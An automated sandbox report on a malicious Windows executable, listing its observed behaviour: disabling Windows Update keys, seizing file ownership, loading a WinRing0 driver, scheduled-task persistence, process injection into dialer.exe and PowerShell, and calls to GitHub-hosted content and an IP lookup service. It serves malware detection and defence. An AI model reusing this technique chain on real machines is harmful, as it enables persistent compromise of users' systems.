Malware Analysis Report

2024-11-16 12:52

Sample ID: 240814-w1cc8a1glp
Target: 40eeb7e6dc706f7e0eac78cc85213220N.exe
SHA256: 9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
Tags: defense_evasion discovery evasion execution exploit persistence
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548

Threat Level: Known bad

The file 40eeb7e6dc706f7e0eac78cc85213220N.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution exploit persistence

Modifies security service

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Possible privilege escalation attempt

Sets service image path in registry

Loads dropped DLL

Checks computer location settings

Indicator Removal: Clear Windows Event Logs

Executes dropped EXE

Modifies file permissions

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Power Settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Modifies registry key

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of UnmapMainImage

Modifies registry class

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-08-14 18:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-08-14 18:22

Reported: 2024-08-14 18:25

Platform: win7-20240704-en

Max time kernel: 120s

Max time network: 125s

Command Line

winlogon.exe

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\system32\reg.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 952 created 408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1344 created 408 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys" C:\Windows\system32\services.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskeng.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\system32\svchost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00508b0a77eeda01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\system32\services.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Google\Chrome\updater.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1360 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1360 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1360 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1360 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 1360 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe C:\Windows\System32\cmd.exe
PID 2756 wrote to memory of 2936 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2936 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2936 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2784 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2784 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2784 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2792 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 2756 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2784 wrote to memory of 2652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2784 wrote to memory of 2652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2756 wrote to memory of 2052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2756 wrote to memory of 2052 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2756 wrote to memory of 824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2756 wrote to memory of 824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2756 wrote to memory of 824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2756 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
